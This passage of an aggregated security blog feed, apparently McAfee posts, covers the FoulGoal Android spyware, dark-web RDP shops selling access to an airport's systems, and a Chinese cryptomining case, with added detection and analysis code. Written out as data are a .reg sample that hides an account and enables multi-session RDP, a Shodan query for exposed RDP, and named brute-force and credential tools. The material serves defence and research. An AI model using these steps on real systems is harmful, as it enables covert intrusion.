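                continue
            if path.lower().endswith(".pdb"):   # filter chance hits on the 4-byte signature
                found.append((sig.decode(), path))
    return found


def username_from_path(path: str) -> Optional[str]:
    """Pull the Windows account name out of a profile-directory build path, if present."""
    m = USER_DIR_RE.search(path)
    return m.group(1) if m else None


def leaked_identities(data: bytes) -> List[str]:
    """Unique account names leaked through debug paths, in the order found."""
    names = []
    for _, path in find_pdb_paths(data):
        name = username_from_path(path)
        if name and name not in names:
            names.append(name)
    return names


if __name__ == "__main__":
    for fmt, path in find_pdb_paths(SAMPLE_BINARY):
        print(fmt, path, "->", username_from_path(path))
```

A raw signature scan rather than a walk of the PE debug directory means the same code still works on packed or partially stripped samples where the directory entry is gone but the string survives. Treat a recovered name as a lead rather than proof of authorship: the same record is exactly the artifact an attacker forges when planting a false flag.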

From grabbing keys to No More Ransom

During the investigation the Dutch police obtained all the decryption keys for CoinVault and partnered with the private sector to build a decryption tool for CoinVault ransomware, successfully mitigating a large portion of the damage caused by CoinVault. This effort gave birth to No More Ransom, an online portal supported by the public and private sector with the largest repository on the planet of free ransomware decryption tools. No More Ransom now has decryptors for 85 ransomware versions. This global initiative has prevented millions of dollars from falling into the hands of cybercriminals. McAfee is proud to be one of the founding members of No More Ransom.

Nomoreransom.org

The next steps

Extorting people with ransomware is wrong, and perpetrators must be held accountable. It is sad to see two talented young people choose a pathway to cybercrime and waste their skills—skills sorely needed in the cybersecurity sector. We hope they will have learned a lesson as they endure the consequences of their actions. The sentencing will take place in about two weeks. Perhaps after they serve their time, they will find someone willing to give them a second chance.

The post What Drives a Ransomware Criminal? CoinVault Developers Convicted in Dutch Court appeared first on McAfee Blogs.

Google Play Users Risk a Yellow Card With Android/FoulGoal.A

This blog post was co-written by Irfan Asrar.

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of data from the victim’s device and encrypts it before upload:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version
  • IMEI, IMSI

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, with the strings “on” or “off” to track when users are looking at their screens:

The Message Queuing Telemetry Transport protocol serves as the communication channel between the device and the malicious server to send and receive commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. The Cryptor class provides the encryption and decryption functionality. The doCrypto function is defined as a common function; its first parameter selects the mode, with “1” for encryption and “2” for decryption:

The encryption key is generated dynamically using the SecureRandom function, which generates a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encryption data. The data with the key is uploaded to the control server.

We believe the malware author uses this AES encryption technique for all uploaded information to escape detection by Google Bouncer and network inspection products.
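To make concrete what “embedding the encryption key into the encryption data” means for an analyst, here is an added example written for this page; it is not code from the FoulGoal sample. The layout is an assumption: the app’s exact addKey layout is not published, so this code splices the 16-byte key into the ciphertext at an offset derived from the ciphertext length and a fixed constant (SLOT_CONST, invented here). AES is replaced by a stand-in stream cipher (SHA-256 in counter mode) so the example runs with the standard library alone; the cipher is not the point, the key placement is. The device record is constructed with invented values shaped after the fields listed above.

```python
import hashlib
import json
import secrets
from typing import Dict, Optional, Tuple

KEY_LEN = 16
SLOT_CONST = 37   # ASSUMED constant: with the content size it fixes where the key sits

# Constructed device record with invented values, shaped after the fields the app collects.
SAMPLE_RECORD = {
    "phone": "+10000000000",
    "model": "ExampleModel",
    "manufacturer": "ExampleVendor",
    "imei": "000000000000000",
    "imsi": "000000000000000",
    "android": "8.0",
    "packages": ["com.example.goldencup", "com.example.chat"],
}


def _keystream(key: bytes, length: int) -> bytes:
    """Stand-in for AES: SHA-256 in counter mode. Only the key handling matters here."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Symmetric stream cipher: the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def add_key(ciphertext: bytes, key: bytes) -> bytes:
    """ASSUMED addKey layout: splice the key in at an offset derived from the size."""
    offset = len(ciphertext) % SLOT_CONST        # always <= len(ciphertext), so the slice is valid
    return ciphertext[:offset] + key + ciphertext[offset:]


def split_key(blob: bytes) -> Tuple[bytes, bytes]:
    """Inverse of add_key: anyone who knows the layout recovers the key from the blob itself."""
    ct_len = len(blob) - KEY_LEN
    offset = ct_len % SLOT_CONST
    key = blob[offset:offset + KEY_LEN]
    return key, blob[:offset] + blob[offset + KEY_LEN:]


def build_upload(record: Dict, key: Optional[bytes] = None) -> bytes:
    """What the device sends: ciphertext with its own per-upload random key spliced in."""
    key = key if key is not None else secrets.token_bytes(KEY_LEN)   # SecureRandom analogue
    plaintext = json.dumps(record, sort_keys=True).encode()
    return add_key(xor_cipher(plaintext, key), key)


def recover_record(blob: bytes) -> Dict:
    """What the control server, or an analyst holding the sample, does with a captured blob."""
    key, ciphertext = split_key(blob)
    return json.loads(xor_cipher(ciphertext, key).decode())


def contains_field_names(blob: bytes) -> bool:
    """What a naive string-matching inspector sees: do any record field names appear on the wire?"""
    return any(name.encode() in blob for name in SAMPLE_RECORD)


if __name__ == "__main__":
    wire = build_upload(SAMPLE_RECORD)
    print("field names visible on the wire:", contains_field_names(wire))
    print("recovered:", recover_record(wire))
```

The upload looks like random bytes to a signature-based inspector, which is all the scheme achieves: because the key travels inside the blob, a captured upload is fully readable by anyone who has reversed the layout once, so this is obfuscation of the transport, not protection of the data.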

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The second stage’s control server is different from the first stage’s. The encryption methodology and the folder structure on the remote server are identical to the first stage.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.

Variants

We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as Android/FoulGoal.A.

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

Major International Airport’s Security System Found for Sale on Dark Web RDP Shop

The closest many of us get to the dark web is watching hackers surf it in television shows or movies. However, it is a very real place that contains lots of stolen data. This data, along with compromised systems, devices, and more are often sold in underground marketplaces that exist on the dark web. One type of marketplace is called a remote desktop protocol (RDP) shop, which provides access to stolen systems for a small fee. Found in one of these RDP shops by McAfee’s ATR team: a major international airport’s security and building automation systems, which could be purchased for only $10 USD.

You might be wondering: what does “access” mean in this scenario? Just as Spotify and Apple Music sell access to artists’ songs, or a gym sells access to its exercise machines, the dark web sells remote access to hacked machines through these RDP shops. Once access is purchased, crooks obtain logins to a victim’s computer system and essentially have full control of it.

Now, the McAfee ATR team is not exactly sure how the cybercriminals got their hands on these systems. But they do know that once something like an airport security system is purchased, crooks can do serious damage. This access could allow cybercriminals to do essentially anything they want – create false alerts to the internal security team, send spam, steal data and credentials, mine for cryptocurrency, or even conduct a ransomware attack on the organization.

So, what happens if your information was potentially compromised in the sale of one of these systems on the dark web? To protect your personal data from larger cybercriminal schemes that originate from RDP shops, be sure to follow these tips: 

  • Be selective about what you share. The best way to control where your information goes is by reducing the sources you share it with. That means not providing your personal information to every app, network, or system that asks for it. Be strict and diligent, and only provide information when it’s crucial to the service or experience it provides.
  • Set up an alert. Compromised information could potentially include financial data. Therefore, it’s best to proactively place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Invest in an identity theft monitoring and recovery solution. If enough personal data becomes compromised by cybercriminals accessing stolen systems, users could be potentially faced with the possibility of identity theft. That’s precisely why they should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Major International Airport’s Security System Found for Sale on Dark Web RDP Shop appeared first on McAfee Blogs.

Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks

Thanks to my colleague Christiaan Beek for his advice and contributions.

While researching underground hacker marketplaces, the McAfee Advanced Threat Research team has discovered that access linked to security and building automation systems of a major international airport could be bought for only US$10.

The dark web contains RDP shops, online platforms selling remote desktop protocol (RDP) access to hacked machines, from which one can buy logins to computer systems to potentially cripple cities and bring down major companies.

RDP, a proprietary protocol developed by Microsoft that allows a user to access another computer through a graphical interface, is a powerful tool for systems administrators. In the wrong hands, RDP can be used to devastating effect. The recent SamSam ransomware attacks on several American institutions demonstrate how RDP access serves as an entry point. Attacking a high-value network can be as easy and cheap as going underground and making a simple purchase. Cybercriminals like the SamSam group have to spend only an initial $10 to get access and then charge a $40K ransom for decryption, not a bad return on investment.

A screenshot of Blackpass.bz, one of the most popular RDP-shops, largely due to the variety of services offered.

Shops explained

Security maven Brian Krebs wrote the article “Really Dumb Passwords” in 2013. That short phrase encapsulates the vulnerability of RDP systems. Attackers simply scan the Internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as Hydra, NLBrute or RDP Forcer to gain access. These tools combine password dictionaries with the vast number of credentials stolen in recent large data breaches. Five years later, RDP shops are even larger and easier to access.
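The brute-force approach described above leaves a distinctive trail on the target: many Windows Security event 4625 (logon failure) records with logon type 10 (RemoteInteractive, i.e. RDP) from one source address, usually followed by a 4624 success from the same address once a password lands. The following is an added detection example, not part of the original article, run over constructed log lines in a simple CSV export; the export format, addresses and user names are invented for the example. It flags a source that reaches a failure threshold inside a sliding time window and, separately, a success that follows failures from the same source, which is the event an RDP shop customer produces when logging in with the purchased credentials.

```python
import csv
from collections import defaultdict, deque
from datetime import datetime, timedelta
from io import StringIO
from typing import Dict, List

# Constructed export of Windows Security events (invented addresses and users).
# event_id 4625 = logon failure, 4624 = logon success; logon_type 10 = RDP.
SAMPLE_EVENTS = """time,event_id,logon_type,user,source_ip
2018-04-16T02:00:01,4625,10,administrator,203.0.113.7
2018-04-16T02:00:04,4625,10,administrator,203.0.113.7
2018-04-16T02:00:07,4625,10,admin,203.0.113.7
2018-04-16T02:00:09,4625,2,jsmith,10.0.0.5
2018-04-16T02:00:11,4625,10,admin,203.0.113.7
2018-04-16T02:00:15,4625,10,root,203.0.113.7
2018-04-16T02:00:18,4625,10,backup,203.0.113.7
2018-04-16T02:00:30,4625,10,jsmith,198.51.100.9
2018-04-16T02:00:44,4625,10,administrator,203.0.113.7
2018-04-16T02:01:02,4624,10,administrator,203.0.113.7
2018-04-16T03:30:00,4624,10,jsmith,198.51.100.9
"""


def parse_events(text: str) -> List[Dict]:
    """Parse the CSV export into dicts with typed fields, ordered by time."""
    events = []
    for row in csv.DictReader(StringIO(text.strip())):
        events.append({
            "time": datetime.fromisoformat(row["time"]),
            "event_id": int(row["event_id"]),
            "logon_type": int(row["logon_type"]),
            "user": row["user"],
            "source_ip": row["source_ip"],
        })
    events.sort(key=lambda e: e["time"])
    return events


def detect_rdp_attacks(text: str, threshold: int = 5,
                       window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Return alerts for RDP brute force and for a success that follows failures."""
    recent_failures = defaultdict(deque)   # source_ip -> deque of (time, user) inside the window
    alerts = []
    for ev in parse_events(text):
        if ev["logon_type"] != 10:          # only RemoteInteractive (RDP) logons matter here
            continue
        q = recent_failures[ev["source_ip"]]
        cutoff = ev["time"] - window
        while q and q[0][0] < cutoff:       # slide the window: drop failures that are too old
            q.popleft()
        if ev["event_id"] == 4625:
            q.append((ev["time"], ev["user"]))
            if len(q) == threshold:         # fire once, when the burst crosses the line
                alerts.append({
                    "kind": "brute_force",
                    "source_ip": ev["source_ip"],
                    "count": len(q),
                    "distinct_users": len({u for _, u in q}),   # >1 hints at spraying
                    "first": q[0][0],
                    "last": ev["time"],
                })
        elif ev["event_id"] == 4624:
            if q:                           # a password landed after failed guesses
                alerts.append({
                    "kind": "success_after_failures",
                    "source_ip": ev["source_ip"],
                    "user": ev["user"],
                    "count": len(q),
                    "first": q[0][0],
                    "last": ev["time"],
                })
                q.clear()                   # do not re-alert on the same burst
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_attacks(SAMPLE_EVENTS):
        print(alert)
```

The success-after-failures alert is the one worth paging on: a brute-force burst against an Internet-facing RDP host is background noise, but a success from the same source within the window is the moment the machine becomes shop inventory. Logon type 10 is the filter that keeps local and network (type 2 and 3) failures from polluting the count.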

The McAfee Advanced Threat Research team looked at several RDP shops, ranging in size from 15 to more than 40,000 RDP connections for sale at Ultimate Anonymity Service (UAS), a Russian business and the largest active shop we researched. We also looked at smaller shops found through forum searches and chats. During the course of our research we noticed that the size of the bigger shops varies from day to day by about 10%. The goal of our research was not to create a definitive list of RDP shops; rather, we sought a better understanding of the general modus operandi, products offered, and potential victims.

The number of compromised systems claimed to be available for sale by several RDP shops. A single compromised system can appear on more than one shop’s list.

RDP access by cybercriminals

How do cybercriminals (mis)use RDP access? RDP was designed to be an efficient way to access a network. By leveraging RDP, an attacker need not create a sophisticated phishing campaign, invest in malware obfuscation, use an exploit kit, or worry about antimalware defenses. Once attackers gain access, they are in the system. Scouring the criminal underground, we found the top uses of hacked RDP machines promoted by RDP shops.

False flags: Using RDP access to create misdirection is one of the most common applications. While preserving anonymity, an attacker can make it appear as if his illegal activity originates from the victim’s machine, effectively planting a false flag for investigators and security researchers. Attackers can plant this flag by compiling malicious code on the victim’s machine, purposely creating false debugging paths and changing compiler environment traces.

Spam: Just as spammers use giant botnets such as Necurs and Kelihos, RDP access is popular among a subset of spammers. Some of the systems we found for sale are actively promoted for mass-mailing campaigns, and almost all the shops offer a free blacklist check, to see if the systems were flagged by Spamhaus and other antispam organizations.

Account abuse, credential harvesting, and extortion: By accessing a system via RDP, attackers can obtain almost all data stored on a system. This information can be used for identity theft, account takeovers, credit card fraud, and extortion, etc.

Cryptomining: In the latest McAfee Labs Threats Report, we wrote about the increase in illegal cryptocurrency mining due to the rising market value of digital currencies. We found several criminal forums actively advertising Monero mining as a use for compromised RDP machines.

Monero mining via RDP advertised on a cybercriminal forum.

Ransomware: The large majority of ransomware is still spread by phishing emails and exploit kits. However, specialized criminal groups such as SamSam are known to use RDP to easily enter their victims’ networks almost undetected.

RDP shop overview

Systems for sale: The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.

Third-party resellers: When comparing “stock” among several RDP shops, we found that the same RDP machines were sold at different shops, indicating that these shops act as resellers.

Windows Embedded Standard: Windows Embedded Standard, now called Windows IoT, is used in a wide variety of systems that require a small footprint. These systems range from thin clients to hotel kiosk systems, announcement boards, point-of-sale (POS) systems, and even parking meters, among others.

Among the thousands of RDP-access systems offered, some configurations stood out. We found hundreds of identically configured Windows Embedded Standard machines for sale at UAS Shop and BlackPass; all these machines were in the Netherlands. This configuration was equipped with a 1-GHz VIA Eden processor. An open-source search of this configuration revealed that it is most commonly used in thin clients and some POS systems. The configurations are associated with several municipalities, housing associations, and health care institutions in the Netherlands.

Thin client and POS systems are often overlooked and not commonly updated, making them an ideal backdoor target for an attacker. Although these systems have a small physical footprint, the business impact of having such a system compromised should not be underestimated. As we’ve observed from previous breaches of retailers through unpatched or vulnerable POS systems, the damage extends far beyond the financial, to customer perception and long-term brand reputation. In regard to the affected systems we discovered, McAfee has notified the identified victims and is working to learn further detail on why and how these identical Windows systems were compromised.

Government and health care institutions: We also came across multiple government systems being sold worldwide, including those linked to the United States, and dozens of connections linked to health care institutions, from hospitals and nursing homes to suppliers of medical equipment. In a March blog post, the Advanced Threat Research team showed the possible consequences of ill-secured medical data and what can happen when an attacker gains access to medical systems. It is very troublesome to see that RDP shops offer an easy way in.

Additional products for sale

Services offered by our researched RDP shops.

In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. The second-largest RDP shop we researched, BlackPass, offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts.

For legal and ethical reasons, we did not purchase any of the products offered. Therefore, we cannot determine the quality of the services.

RDP ransomware attack scenario

Is it possible to find a high-value victim using an RDP shop? The Advanced Threat Research team put this theory to the test. By leveraging the vast amounts of connections offered by the RDP shops, we were able to quickly identify a victim that fits the profile of a high-value target in the United States.

We found a newly posted (on April 16) Windows Server 2008 R2 Standard machine on the UAS Shop. According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system.

RDP access offered for sale.

UAS Shop hides the last two octets of the IP addresses of the systems it offers for sale and charges a small fee for the complete address. (We did not pay for any services offered by UAS or any other shop.) To locate the system being sold, we used shodan.io to search for any open RDP ports at that specific organization using this query:

org:"City XXX" port:"3389"

The results were far more alarming than we anticipated. The Shodan search narrowed 65,536 possible IPs to just three that matched our query. By obtaining a complete IP address we could now look up the WHOIS information, which revealed that all the addresses belonged to a major international airport. This is definitely not something you want to discover on a Russian underground RDP shop, but the story gets worse.

From bad to worse

Two of the IP addresses presented a screenshot of the accessible login screens.

A login screen that matches the configuration offered in the RDP shop.

A closer look at the screenshots shows that the Windows configuration (preceding screen) is identical to the system offered in the RDP shop. There are three user accounts available on this system, one of which is the administrator account. The names of the other accounts seemed unimportant at first but after performing several open-source searches we found that the accounts were associated with two companies specializing in airport security; one in security and building automation, the other in camera surveillance and video analytics. We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz.

The login screen of a second system on the same network.

Looking at the other login account (preceding screen), we saw it is part of the domain with a very specific abbreviation. We performed the same kind of search on the other login account and found the domain is most likely associated with the airport’s automated transit system, the passenger transport system that connects terminals. It is troublesome that a system with such significant public impact might be openly accessible from the Internet.

Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack.

Anonymization

To publish our findings, we have anonymized the data to prevent any disclosure of sensitive security information.

Basic forensic and security advice

Playing hide and seek

Besides selling countless connections, RDP shops offer tips on how to remain undetected when an attacker wants to use the freshly bought RDP access.

This screen from the UAS Shop’s FAQ section explains how to add several registry keys to hide user accounts.

The UAS Shop offers a zip file with a patch to allow multiuser RDP access, which is not possible by default on some Windows versions. The zip file contains two .reg files that alter the Windows registry and a patch file that alters termsrv.dll to allow concurrent remote desktop connections.

These alterations to the registry and files leave obvious traces on a system. Those indicators can be helpful when investigating misuse of RDP access.

In addition to checking for these signs, it is good practice to check the Windows event and security logs for unusual logon types and RDP use. The following screen, from the well-known SANS Digital Forensics and Incident Response poster, explains where the logs can be found.


Source: SANS DFIR Poster 2015.
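The checks described above can be scripted. What follows is an added example in Python, my own code rather than anything from the McAfee post: it pulls RemoteInteractive (LogonType 10) logons and brute-force sources out of a flattened Security-log export, and inspects a .reg file for the two tweaks the shops hand out. The log lines and the .reg content are constructed for the example. The two registry paths are assumptions, since the post does not name them; they are the documented Windows locations for hiding an account from the logon screen (SpecialAccounts\UserList) and for allowing more than one session per user (fSingleSessionPerUser).

```python
import re
from collections import Counter

# Constructed sample: Security-log events flattened to one line each
# (EventID 4624 = successful logon, 4625 = failed logon; LogonType 10 = RemoteInteractive, i.e. RDP).
# Made-up lines for the example, not data from the investigation described above.
SAMPLE_SECURITY_LOG = """\
2018-04-16T02:13:05 EventID=4624 LogonType=10 Account=svc_rdp Source=198.51.100.23
2018-04-16T02:13:09 EventID=4624 LogonType=10 Account=svc_rdp Source=198.51.100.23
2018-04-16T02:15:41 EventID=4624 LogonType=3 Account=FILESRV$ Source=10.0.0.12
2018-04-16T03:02:17 EventID=4625 LogonType=10 Account=administrator Source=203.0.113.77
2018-04-16T03:02:18 EventID=4625 LogonType=10 Account=administrator Source=203.0.113.77
2018-04-16T03:02:19 EventID=4625 LogonType=10 Account=admin Source=203.0.113.77
2018-04-16T03:02:20 EventID=4625 LogonType=10 Account=root Source=203.0.113.77
2018-04-16T03:02:21 EventID=4625 LogonType=10 Account=guest Source=203.0.113.77
2018-04-16T08:00:01 EventID=4624 LogonType=2 Account=jsmith Source=-
"""

# Constructed .reg content in the style of the "hide user account" / multi-session tweaks.
# The key paths are assumptions (the post does not name them): they are the documented
# Windows locations for hiding accounts from the logon screen and for per-user sessions.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"svc_rdp"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fSingleSessionPerUser"=dword:00000000
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<type>\d+) "
    r"Account=(?P<account>\S+) Source=(?P<source>\S+)$"
)
USERLIST_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist"
TERMSRV_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"


def parse_events(text):
    """Turn the flattened export into dicts with numeric EventID/LogonType."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["id"], e["type"] = int(e["id"]), int(e["type"])
            events.append(e)
    return events


def rdp_logons(events):
    """Successful RDP sessions: EventID 4624 with LogonType 10 (RemoteInteractive)."""
    return [e for e in events if e["id"] == 4624 and e["type"] == 10]


def failed_logon_sources(events, threshold=5):
    """Source addresses with at least `threshold` failed logons (4625): a brute-force signal."""
    counts = Counter(e["source"] for e in events if e["id"] == 4625)
    return {src: n for src, n in counts.items() if n >= threshold}


def parse_reg(text):
    """Parse a .reg file into {key_path (lowercased): {value_name: raw_value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value.strip()
    return keys


def audit_reg(text):
    """Flag accounts hidden from the logon screen and the multi-session tweak."""
    keys = parse_reg(text)
    hidden = sorted(name for name, val in keys.get(USERLIST_KEY, {}).items()
                    if val.lower() == "dword:00000000")
    multi = keys.get(TERMSRV_KEY, {}).get("fSingleSessionPerUser", "").lower() == "dword:00000000"
    return {"hidden_accounts": hidden, "multi_session_enabled": multi}


if __name__ == "__main__":
    evts = parse_events(SAMPLE_SECURITY_LOG)
    for e in rdp_logons(evts):
        print("RDP logon", e["ts"], e["account"], "from", e["source"])
    print("brute-force sources:", failed_logon_sources(evts))
    print("registry audit:", audit_reg(SAMPLE_REG))
```

On a real box, export the Security log with wevtutil or Get-WinEvent and flatten the fields the same way; pair the registry audit with a hash comparison of termsrv.dll against a known-good copy from the same patch level, since the multiuser patch modifies that file directly.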

Basic RDP security measures

Outside access to a network can be necessary, but it always comes with risk. We have summarized some basic RDP security measures:

  • Using complex passwords and two-factor authentication makes brute-force RDP attacks far less likely to succeed
  • Do not allow RDP connections over the open Internet
  • Lock out users and block or timeout IPs that have too many failed login attempts
  • Regularly check event logs for unusual login attempts
  • Consider using an account-naming convention that does not reveal organizational information
  • Enumerate all systems on the network and list how they are connected and through which protocols. This also applies for Internet of Things and POS systems.

Conclusion

Remotely accessing systems is essential for system administrators to perform their duties. Yet they must take the time to set up remote access in a way that is secure and not easily exploitable. RDP shops are stockpiling addresses of vulnerable machines and have reduced victim selection for attackers to a simple online purchase.

Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock. Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured. Protecting systems requires an integrated approach of defense in depth and proactive attitudes from every employee.

The post Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks appeared first on McAfee Blogs.

Chinese arrest 20 in major Crypto Currency Mining scam

According to the Chinese-language publication Legal Daily, police in two districts of China have arrested 20 people for their roles in a major cryptocurrency mining operation that earned the criminals more than 15 million yuan (currently about $2 million).

The hackers installed mining software developed by Dalian Yuping Network Technology Company (大连昇平网络科技有限) that was designed to covertly mine three types of coins: Digibyte (DGB, currently valued at about $0.03 each), Siacoin (SC, currently about $0.01 each) and Decred (DCR, currently about $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well. As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Yang participated as a forum moderator on a site called the "Tianxia Internet Bar Forum", and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Yang popularized the cheat program by encouraging others to suggest new functionality. The users of the tool did not suspect that they were mining cryptocurrency while using the cheat. More than 30,000 victims used his cheat software and were secretly mining cryptocurrency for him.
Yang had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes. He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining. It turns out that these cards ALSO were trojaned! As a major customer of Dalian Yuping, Yang was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked managing Internet cafes. After profiting from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province. The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them to embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in Internet cafes. The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans. In addition to the illegal advertising software embedded in those 3.89 million video cards, their cryptocurrency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems. Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by reporter Xu Peng and correspondents Liu Guizeng and Wang Yan.) (记者 徐鹏 通讯员 刘贵增 王艳)

Report: Gaming Addiction is a Real Thing. So What Can Parents Do Next?

It’s one of my biggest parenting regrets to date: About a decade ago, I failed to put limits around my teen’s passion for playing video games. He loved them, and I let him.

I convinced myself that my son’s video gaming provided him with an instant community where he daily climbed to the top of the scoreboard. A personal, consistent win for my first-born, more quiet child, right?

Looking back, I lied to myself at crucial moments along the way. I minimized his growing obsession by calling it a hobby. As he grew more engaged with gaming, he became more distant from our family. I ignored the fact that he was acquiring friends I didn’t know and forfeiting time outdoors for his preferred virtual landscape.

When our relationship hit several rough patches in later years, I failed to connect that friction back to his top-heavy gaming habits. All the while, as a mom, I knew deep down (in my mom “knower”) I could have — should have — done more to limit his gaming.

New Findings

Not surprisingly, the World Health Organization (WHO) just recently classified a new form of addiction called “gaming disorder.” That designation means health professionals can now treat dangerous levels of video gaming as a legitimate addiction.

Thankfully, my son’s one-time excessive gaming didn’t reach the addiction level even though it was serious enough to negatively impact our family dynamic.

I can’t go back. However, if there’s a parent who can learn from my heartache in this area, I hope this post might help.

The Upside

We know gaming isn’t the enemy. In fact, gaming has been credited with helping kids overcome depression, anxiety, and social insecurities. Gaming is also blowing open new doors in education as we understand how today’s digital learners (many of whom are gamers) consume information and find solutions. We know gaming skills are helping build tomorrow’s cybersecurity experts, app developers, programmers, military strategists, surgeons, and leaders.

With the benefits understood, balance is the magic word when it comes to the healthy use of any technology we welcome into our homes.

Definition

The WHO’s official definition of “gaming disorder” includes:

  • A pattern of behavior for at least 12 months in which gaming is out of control.
